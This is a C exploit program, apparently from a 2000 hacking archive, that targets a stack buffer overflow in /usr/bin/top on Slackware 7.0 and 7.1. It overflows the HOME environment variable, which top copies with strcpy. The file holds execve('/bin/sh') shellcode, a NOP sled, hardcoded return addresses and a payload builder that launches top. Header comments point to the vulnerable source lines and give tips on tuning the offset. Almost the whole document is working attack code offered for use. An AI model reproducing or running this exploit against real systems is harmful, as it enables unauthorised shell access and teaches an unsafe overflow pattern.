/* * * topoff.c (08/02/00) * * Live buffer overflow (stack smasher/breaker/etc..) * Exploits /usr/bin/top on Slackware 7.0.0 and 7.1.0. * Earlier version should also be assumed vulnerable. * * By: Ben Lull (blull@valleylocal.com) * * * * <--- Begin my Little Babble ---> * You know your bored when you go through utils like top * which don't have a sXid bit and spend the time generating * the shell code from scratch and all that fun stuff as * well as making the code pretty.. * * Note: * grep(1) is your friend... example usage: * me@synchro~> grep -F -n "str" *.c * me@synchro~> grep -F -n "get" *.c * me@synchro~> grep -F -n "print" *.c * me@synchro~> grep -n "\[\]" *.c | grep -F "char" * * * * Experienced working Offsets: * (It's obvious, look at the code) * BUFLEN - strlen(code) - EIP. * * You should know this one. * If you don't.. you shouldn't * Have toys such as this. * * * * Exploit Occurs: * * top.h: * 50: #define MAXNAMELEN 1024 * * * top.c: * 211: char rcfile[MAXNAMELEN]; * * 223: if (getenv("HOME")) { * 224: strcpy(rcfile, getenv("HOME")); * 225: strcat(rcfile, "/"); * 226: } * . * . * . * 1495: if (getenv("HOME")) { * 1496: strcpy(rcfile, getenv("HOME")); * */ #include #include #define OFFSET 0 #define BUFLEN 1032 #define RET 0xbffffb35 /* Slackware 7.1 */ //#define RET 0xbffffafc /* Slackware 7.0 */ #define NOP 0x90 #define TOP "/usr/bin/top" char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\xc9\xc3" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; void usage(char *arg) { fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg); fprintf(stderr, "Examples:\n"); fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg); fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg); fprintf(stderr, "\t%s 429 up 0xbffffad8 -=- EIP set to 0xbffffad8 and increased by 429 bytes\n", arg); fprintf(stderr, "\t%s 429 down 0xbffffad8 -=- EIP set to 0xbffffad8 and decreased by 429 bytes\n\n", arg); exit(1); } int main(int argc, char *argv[]) { char *buf, *p; long *addressp, address; int offset=OFFSET; int i; if((argc < 3) || (argc > 4)) usage(argv[0]); if(argc == 3) { if(!strcmp(argv[2], "up")) { address = RET + atoi(argv[1]); printf("Increasing offset by: %d\n", atoi(argv[1])); printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1])); } if(!strcmp(argv[2], "down")) { address = RET - atoi(argv[1]); printf("Decreasing offset by: %d\n", atoi(argv[1])); printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1])); } } if(argc >= 4) { if(!strcmp(argv[2], "up")) { address = strtoul(argv[3], NULL, 16) + atoi(argv[1]); printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16)); printf("Increasing offset by: %d\n", atoi(argv[1])); printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1]))); } if(!strcmp(argv[2], "down")) { address = strtoul(argv[3], NULL, 16) + atoi(argv[1]); printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16)); printf("Decreasing offset by: %d\n", atoi(argv[1])); printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1]))); } } if (!(buf = (char *)malloc(BUFLEN))) { printf("Can't allocate memory.\n"); exit(-1); } p = buf; addressp = (long *) p; for (i = 0; i < BUFLEN; i+=4) { *(addressp++) = address; } for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) { buf[i] = NOP; } p = buf + (BUFLEN - strlen(code) - 4); for (i = 0; i < strlen(code); i++) *(p++) = code[i]; buf[BUFLEN] = '\0'; /* * A nifty trick is to run /bin/sh -i and run top manualy. * This way you can figure out if your going the right way or not * * strace/gdb /usr/bin/top * */ setenv("HOME", buf, 1); system(TOP); } /* www.hack.co.za [21 August 2000]*/